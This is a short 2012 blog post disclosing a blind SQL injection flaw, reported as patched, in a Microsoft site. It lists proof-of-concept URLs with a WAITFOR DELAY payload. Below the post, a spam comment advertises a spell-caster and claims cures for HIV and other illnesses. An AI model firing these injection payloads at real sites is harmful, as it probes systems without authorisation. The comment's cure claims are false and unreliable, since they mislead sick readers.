Thursday, July 12, 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in

Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof of concept URLs which will cause a time delay of 25 seconds are provided below:
  •;WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  •;WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  •;WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  •;WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en

This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat


  1. Thank you for your miracle Doctor Osemu Okpamen

    This article is dedicated to the Doctor Osemu Okpamen. I have been married with my wife for 5 years and recently she broke up with me and it hurt me deeply when she told me to leave her alone and that she does not love me anymore when i was always faithful and honest to her. I tried all the ways to get her back buying her what she wants like i always did and she still left me heart broken and she even has a new boyfriend which destroyed me even more until a friend of mine from high school directed me to this genuine spell Doctor called Osemu Okpamen. This man changed my life completely. I followed everything he told me to do and my wife came back begging for me back. I was stunned everything happened exactly like he told me. I had faith in everything he told me and everything was true. Also he was there every moment until i got my happiness back and he also provides spells that cures impotence, bareness, diseases such as HIV/AID E.T.C You can contact him via email at { } or visit his website He will help you in anything you need and quick to answer once you contact him.

    You can also call me for more info +1 (914)-517-3229.